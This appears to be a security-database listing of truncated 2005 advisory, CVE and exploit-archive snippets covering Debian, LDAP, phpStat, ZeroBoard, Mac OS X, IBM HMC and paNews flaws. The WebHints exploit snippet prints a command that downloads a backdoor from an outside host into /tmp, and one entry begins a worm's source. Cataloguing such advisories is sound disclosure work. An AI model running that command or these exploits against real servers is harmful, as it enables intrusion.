[SA15955] Debian "apt-setup" Insecure File Permission Security Issue

---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...

pam_ldap/nss_ldap password leak in a master+slave+start_tls LDAP setup

pamldap/nssldap fail to re-start TLS when following referred connections. This can result in credentials being sent in clear text when pamldap/nssldap attempt to rebind. This affects any LDAP infrastructure which can generate referrals during NSS or PAM operations generally a master+slave LDAP...

Webhints.pl

This exploit uses a backdoor that isn't located on this server. $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln Expl0it...

phpStat 1.5 - setup.php Authentication Bypass (PHP) (2)

phpStat 1.5 - setup.php Authentication Bypass PHP 2 ? / PHP Stat Administrative User Authentication Bypass POC Exploit Code by Nikyt0x - Soulblack Security Research Advisory: http://www.soulblack.com.ar/repo/papers/phpstatadvisory.txt Saludos: Soulblack Staff, Status-x, NeosecurityTeam, KingMetal...

ZeroBoard - Worm Source Code

/ The worm exploits a vulnerability in ZeroBoard, allowing an attacker to inject arbitrary PHP code. /str0ke / / ZeroBoard -1day INE w0rm / include include include include include include include include include ifdef sun include endif / SunOS / define DEBUGING undef DEBUGING define TMPFILE...

CVE-2005-0594

Buffer overflow in the Netinfo Setup Tool NeST allows local users to execute arbitrary code...

CVE-2005-0594

Buffer overflow in the Netinfo Setup Tool NeST allows local users to execute arbitrary code...

DEBIAN-CVE-2005-0544

phpMyAdmin 2.6.1 allows remote attackers to obtain the full path of the server via direct requests to 1 sqlvalidator.lib.php, 2 sqlparser.lib.php, 3 selecttheme.lib.php, 4 selectlang.lib.php, 5 relationcleanup.lib.php, 6 headermetastyle.inc.php, 7 getforeign.lib.php, 8 displaytbllinks.lib.php, 9...

CVE-2005-0539

Unknown vulnerability in IBM Hardware Management Console HMC before 4.4 for POWER5 servers allows local users to gain privileges, related to the Guided Setup Wizard...

Microsoft Internet Explorer Content Advisor contains a buffer overflow

Overview A buffer overflow in Microsoft Internet Explorer Content Advisor may allow a remote attacker to execute arbitrary code on a vulnerable system. Description The Content Advisor is used to control what content is viewable in Internet Explorer. A buffer overflow exists in the routines that...

CVE-2005-0713

The CVE-2005-0713 issue affects Apple Mac OS X up to and including 10.3.7, where the Bluetooth Setup Assistant can be launched without a keyboard or Bluetooth device, allowing local users to bypass access restrictions and gain privileges. The underlying risk is local privilege escalation via an i...

CVE-2005-0713

The Bluetooth Setup Assistant for Mac OS X before 10.3.8 can be launched without a keyboard or Bluetooth device, which allows local users to bypass access restrictions and gain privileges...

CVE-2005-0713

The Bluetooth Setup Assistant for Mac OS X before 10.3.8 can be launched without a keyboard or Bluetooth device, which allows local users to bypass access restrictions and gain privileges...

Mac OS X Multiple Vulnerabilities (Security Update 2005-003)

The remote host is missing Security Update 2005-003. This security update contains security fixes for the following applications : - AFP Server - Bluetooth Setup Assistant - Core Foundation - Cyrus IMAP - Cyrus SASL - Folder Permissions - Mailman - Safari These programs have multiple...

Apple Mac OSX 10.3.x - Multiple Vulnerabilities

// source: https://www.securityfocus.com/bid/12863/info Multiple security vulnerabilities are reported to affect Apple Mac OS X. These issues were disclosed in the referenced vendor advisory. Insecure permissions are reported to be set on certain Apple Mac OS X folders . It is reported that becau...

paNews 2.0.4b Multiple Input Validation Vulnerabilities

The remote host is running a version of paNews that suffers from the following vulnerabilities: - SQL Injection Issue in the 'login' method of includes/auth.php. A remote attacker can leverage this vulnerability to add users with arbitrary privileges. - Local Script Injection Vulnerability in...

[SA14377] IBM HMC Guided Setup Wizard Vulnerability

TITLE: IBM HMC Guided Setup Wizard Vulnerability SECUNIA ADVISORY ID: SA14377 VERIFY ADVISORY: http://secunia.com/advisories/14377/ CRITICAL: Less critical IMPACT: Privilege escalation WHERE: Local system OPERATING SYSTEM: IBM Hardware Management Console HMC http://secunia.com/product/3967/...

CVE-2005-0539

Unknown vulnerability in IBM Hardware Management Console HMC before 4.4 for POWER5 servers allows local users to gain privileges, related to the Guided Setup Wizard...

CVE-2005-0539

CVE-2005-0539 affects IBM Hardware Management Console (HMC) for POWER5 servers prior to version 4.4. The issue, related to the Guided Setup Wizard, permits local users to gain privileges (partial confidentiality, integrity, and availability impacts described by CVSS 2.0: Base 4.6). IBM lists a fi...

paNews v2.0b4 - PHP Injection

oooo oooo oooooooo8 ooooooooooo 8888o 88 888 88 888 88 88 888o88 888oooooo 888 88 8888 888 888 o88o 88 o88oooo888 o888o Network security team nst.e-nex.com Title: paNews v2.0b4 Bug found by: тёмыч Date: 20.02.2005 web: http://www.phparena.net/panews.php google: allintitle:paNews v2.0b4 PHP...